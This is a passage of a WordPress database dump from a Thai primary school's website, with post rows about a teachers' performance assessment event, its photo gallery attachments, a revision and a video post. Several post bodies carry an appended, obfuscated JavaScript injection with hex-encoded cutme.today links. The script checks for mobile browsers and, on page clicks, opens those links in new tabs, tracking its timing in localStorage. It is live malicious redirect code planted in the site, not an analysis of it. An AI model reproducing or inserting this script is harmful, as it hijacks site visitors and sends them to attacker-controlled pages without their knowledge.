_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรม ประเมินผลการพัฒนางานตามข้อตกลง (PA)','','publish','closed','closed','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9e%e0%b8%b1%e0%b8%92','','','2024-09-12 21:37:19','2024-09-12 14:37:19','',0,'http://pakhaeng.ssk.in.th/?p=1139',0,'post','',0),
(1140,1,'2024-09-12 21:36:23','2024-09-12 14:36:23','','LINE_ALBUM_PAปีงบ25662567_240911_17','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_17','','','2024-09-12 21:36:23','2024-09-12 14:36:23','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_17.jpg',0,'attachment','image/jpeg',0),
(1141,1,'2024-09-12 21:36:23','2024-09-12 14:36:23','','LINE_ALBUM_PAปีงบ25662567_240911_15','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_15','','','2024-09-12 21:36:23','2024-09-12 14:36:23','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_15.jpg',0,'attachment','image/jpeg',0),
(1142,1,'2024-09-12 21:36:23','2024-09-12 14:36:23','','LINE_ALBUM_PAปีงบ25662567_240911_13','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_13','','','2024-09-12 21:36:23','2024-09-12 14:36:23','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_13.jpg',0,'attachment','image/jpeg',0),
(1143,1,'2024-09-12 21:36:23','2024-09-12 14:36:23','','LINE_ALBUM_PAปีงบ25662567_240911_12','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_12','','','2024-09-12 21:36:23','2024-09-12 14:36:23','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_12.jpg',0,'attachment','image/jpeg',0),
(1144,1,'2024-09-12 21:36:23','2024-09-12 14:36:23','','LINE_ALBUM_PAปีงบ25662567_240911_14','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_14','','','2024-09-12 21:36:23','2024-09-12 14:36:23','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_14.jpg',0,'attachment','image/jpeg',0),
(1145,1,'2024-09-12 21:36:23','2024-09-12 14:36:23','','LINE_ALBUM_PAปีงบ25662567_240911_16','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_16','','','2024-09-12 21:36:23','2024-09-12 14:36:23','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_16.jpg',0,'attachment','image/jpeg',0),
(1146,1,'2024-09-12 21:36:27','2024-09-12 14:36:27','','LINE_ALBUM_PAปีงบ25662567_240911_11','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_11','','','2024-09-12 21:36:27','2024-09-12 14:36:27','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_11.jpg',0,'attachment','image/jpeg',0),
(1147,1,'2024-09-12 21:36:27','2024-09-12 14:36:27','','LINE_ALBUM_PAปีงบ25662567_240911_10','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_10','','','2024-09-12 21:36:27','2024-09-12 14:36:27','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_10.jpg',0,'attachment','image/jpeg',0),
(1148,1,'2024-09-12 21:36:27','2024-09-12 14:36:27','','LINE_ALBUM_PAปีงบ25662567_240911_9','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_9','','','2024-09-12 21:36:27','2024-09-12 14:36:27','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_9.jpg',0,'attachment','image/jpeg',0),
(1149,1,'2024-09-12 21:36:28','2024-09-12 14:36:28','','LINE_ALBUM_PAปีงบ25662567_240911_7','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_7','','','2024-09-12 21:36:28','2024-09-12 14:36:28','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_7.jpg',0,'attachment','image/jpeg',0),
(1150,1,'2024-09-12 21:36:28','2024-09-12 14:36:28','','LINE_ALBUM_PAปีงบ25662567_240911_6','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_6','','','2024-09-12 21:36:28','2024-09-12 14:36:28','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_6.jpg',0,'attachment','image/jpeg',0),
(1151,1,'2024-09-12 21:36:28','2024-09-12 14:36:28','','LINE_ALBUM_PAปีงบ25662567_240911_8','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_8','','','2024-09-12 21:36:28','2024-09-12 14:36:28','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_8.jpg',0,'attachment','image/jpeg',0),
(1152,1,'2024-09-12 21:36:31','2024-09-12 14:36:31','','LINE_ALBUM_PAปีงบ25662567_240911_5','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_5','','','2024-09-12 21:36:31','2024-09-12 14:36:31','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_5.jpg',0,'attachment','image/jpeg',0),
(1153,1,'2024-09-12 21:36:31','2024-09-12 14:36:31','','LINE_ALBUM_PAปีงบ25662567_240911_4','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_4','','','2024-09-12 21:36:31','2024-09-12 14:36:31','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_4.jpg',0,'attachment','image/jpeg',0),
(1154,1,'2024-09-12 21:36:36','2024-09-12 14:36:36','','LINE_ALBUM_PAปีงบ25662567_240911_3','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_3','','','2024-09-12 21:36:36','2024-09-12 14:36:36','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_3.jpg',0,'attachment','image/jpeg',0),
(1155,1,'2024-09-12 21:36:36','2024-09-12 14:36:36','','LINE_ALBUM_PAปีงบ25662567_240911_2','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_2','','','2024-09-12 21:36:36','2024-09-12 14:36:36','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_2.jpg',0,'attachment','image/jpeg',0),
(1156,1,'2024-09-12 21:36:36','2024-09-12 14:36:36','','LINE_ALBUM_PAปีงบ25662567_240911_1','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_1','','','2024-09-12 21:36:36','2024-09-12 14:36:36','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_1.jpg',0,'attachment','image/jpeg',0),
(1157,1,'2024-09-12 21:36:44','2024-09-12 14:36:44','','LINE_ALBUM_PAปีงบ25662567_240911_6','','inherit','','closed','','line_album_pa%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a25662567_240911_6-2','','','2024-09-12 21:36:44','2024-09-12 14:36:44','',1139,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_6-1.jpg',0,'attachment','image/jpeg',0),
(1158,1,'2024-09-12 21:37:17','2024-09-12 14:37:17','<!-- wp:paragraph -->\n<p>สำหรับข้าราชการครูและบุคลากรทางการศึกษา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>วันที่ 11 กันยายน พ.ศ.2567 คณะครู โรงเรียนบ้านหนองปลาเข็ง กอไหล่ รับการประเมินผลการพัฒนางานตามข้อตกลง (PA)สำหรับข้าราชการครูและบุคลากรทางการศึกษาประจำปีงบประมาณ 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ขอขอบพระคุณคณะกรรมการทุกท่านมา ณ โอกาสนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1140,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_17-1024x576.jpg\" alt=\"\" class=\"wp-image-1140\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1145,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_16-1024x576.jpg\" alt=\"\" class=\"wp-image-1145\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1141,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_15-1024x576.jpg\" alt=\"\" class=\"wp-image-1141\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1144,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_14-1024x576.jpg\" alt=\"\" class=\"wp-image-1144\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1142,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_13-1024x576.jpg\" alt=\"\" class=\"wp-image-1142\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1143,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_12-1024x576.jpg\" alt=\"\" class=\"wp-image-1143\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1146,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_11-1024x768.jpg\" alt=\"\" class=\"wp-image-1146\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1147,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_10-1024x576.jpg\" alt=\"\" class=\"wp-image-1147\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1148,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_9-1024x768.jpg\" alt=\"\" class=\"wp-image-1148\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1151,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_8-1024x768.jpg\" alt=\"\" class=\"wp-image-1151\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1149,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_7-1024x768.jpg\" alt=\"\" class=\"wp-image-1149\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1150,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_6-1024x768.jpg\" alt=\"\" class=\"wp-image-1150\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1152,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_5-1024x576.jpg\" alt=\"\" class=\"wp-image-1152\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1153,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_4-1024x576.jpg\" alt=\"\" class=\"wp-image-1153\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1154,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_3-1024x576.jpg\" alt=\"\" class=\"wp-image-1154\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1155,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1155\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1156,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/LINE_ALBUM_PAปีงบ25662567_240911_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1156\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรม ประเมินผลการพัฒนางานตามข้อตกลง (PA)','','inherit','closed','closed','','1139-revision-v1','','','2024-09-12 21:37:17','2024-09-12 14:37:17','',1139,'http://pakhaeng.ssk.in.th/?p=1158',0,'revision','',0),
(1159,1,'2024-09-12 21:44:21','2024-09-12 14:44:21','<!-- wp:video {\"id\":1160} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/สุขาดีมีความสุข.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 